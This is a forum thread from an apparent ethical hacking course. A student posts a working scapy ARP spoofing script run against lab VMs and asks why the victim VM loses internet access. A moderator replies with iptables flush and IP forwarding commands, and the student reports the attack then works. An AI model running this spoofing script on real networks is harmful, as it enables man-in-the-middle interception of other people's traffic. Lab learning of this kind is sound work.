Tagged: arp spoof
- This topic has 5 replies, 2 voices, and was last updated 4 years, 3 months ago by Diego Pérez.
- AuthorPosts
- August 31, 2020 at 8:26 pm #44914NikolajevZjParticipant
I’m doing the arp spoof section of the course.When I run my script i manage to fool both the windows VM and the router,but even after typing the echo 1 > /proc/sys/net/ipv4/ip_forward command the windows machine doesn’t have internet access.
Script:
#!/usr/bin/env python
# -*- coding: utf-8 -*-import scapy.all as scapy
import timedef title():
print(” ___ _____ __ __ _____ “)
print(” / _ \ / ___| / _| / | | _ |”)
print(“/ /_\ \_ __ _ __ \--. _ __ ___ ___ | |_
| | | |/’ |”)
print(“| _ | ‘__| ‘_ \ `–. \ ‘_ \ / _ \ / _ \| _| | | | /| |”)
print(“| | | | | | |_) | /\__/ / |_) | (_) | (_) | | _| |_\ |_/ /”)
print(“\_| |_/_| | .__/ \____/| .__/ \___/ \___/|_| \___(_)___/”)
print(” | | | | “)def get_mac(ip):
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst=”ff:ff:ff:ff:ff:Ff”)
arp_request_broadcast = broadcast/arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]return answered_list[0][1].hwsrc
def spoof(target_ip, spoof_ip):
target_mac = get_mac(target_ip)
packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
scapy.send(packet)title()
while True:
spoof(“10.0.2.15”, “10.0.2.1”)
spoof(“10.0.2.1”, “10.0.2.15”)
time.sleep(2)
result of kali ifconfig:
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500inet 10.0.2.4 netmask 255.255.255.0 broadcast 10.0.2.255
inet6 fe80::a00:27ff:fed5:7a16 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:d5:7a:16 txqueuelen 1000 (Ethernet)
RX packets 5008 bytes 4040358 (3.8 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4326 bytes 1807344 (1.7 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 48 bytes 2677 (2.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 48 bytes 2677 (2.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.27 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::ab51:ec48:9d2c:390b prefixlen 64 scopeid 0x20<link>
ether 00:c0:ca:98:9f:fb txqueuelen 1000 (Ethernet)
RX packets 918 bytes 154601 (150.9 KiB)
RX errors 0 dropped 101 overruns 0 frame 0
TX packets 452 bytes 44848 (43.7 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
result of route -n:
Kernel IP routing tableDestination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 10.0.2.1 0.0.0.0 UG 100 0 0 eth0
0.0.0.0 192.168.1.1 0.0.0.0 UG 600 0 0 wlan0
10.0.2.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0
192.168.1.0 0.0.0.0 255.255.255.0 U 600 0 0 wlan0
I’m honestly stuck,could someone help me?
Also the windows and kali use the NAT network.September 1, 2020 at 2:09 am #44922Diego PérezModeratorHi!
Can you check that windows and kali have internet access before running the attack?
Can you show the results of:
ifconfig and route -n in kali
ipconfig in windows
Can you share a screenshot of the Network settings used in VirtualBox for both machines?Bur use screenshots please as the info you have shared is hard to read. And for the code use code button from the menu because I can’t read it properly as it doesn’t have any indentation.
Thanks!
DiegoSeptember 1, 2020 at 8:53 am #44932NikolajevZjParticipantHello!
Both kali and windows VM have internet access before the attack
kali network settings:
https://mega.nz/file/Z103STYJ#dzoaECQVUZHprhEtTDtsmgqCyKJv3CBjBUSljaJ5k0w
kali ifconfig and route -n:
https://mega.nz/file/Q5tlSbaA#pFKJ7GEPyBTVNpOJlJnHBNwVosaz5e4772cVfqH0g_g
windows ipconfig:
https://mega.nz/file/Ek11hZDB#1g04I9TpP3tQvAljNoauSGhIg9N3MzpJhNxvcgGOcN0
windows network settings:
https://mega.nz/file/EgkhDDzS#HLy6w9X1TZZGWLX-0YddZjud8qcMJxO1Ms2eJHErA1k
my code(sorry i could not find the code button):
https://mega.nz/file/JwkhnBDS#UMlLxjIFj8XNIqiOXRCfiKxkCKWVnQV52EhWUSquuxQ
Thanks for your reply!September 2, 2020 at 3:01 am #44961Diego PérezModeratorHi!
Try by unplugging the wireless adapter, there’s no need for it. Then flush iptables rules and enable packet forwarding again:
iptables –flush
iptables –table nat –flush
iptables –delete-chain
iptables –table nat –delete-chain
iptables -P FORWARD ACCEPTEnable port forwarding
echo 1 > /proc/sys/net/ipv4/ip_forwardThen run the attack again.
Let me know how it goes!
DiegoSeptember 2, 2020 at 6:35 am #44968NikolajevZjParticipantHello!
I managed to solve my problem.Firstly i noticed that my windowsVM had an expired license,so I recovered the first snapshot.Then i tried again and everything worked perfectly.I also stopped the program before the execution of echo command.I don’t know if those two properties were the actual problem,or if it was some network issue
that didn’t occur further,anyway it works know.Thanks for the iptables commands, I think they might be useful if I encounter similar problems.
Best regards!September 3, 2020 at 2:54 am #44998Diego PérezModeratorHi!
Cool you got it!
Diego - AuthorPosts
- You must be logged in to reply to this topic.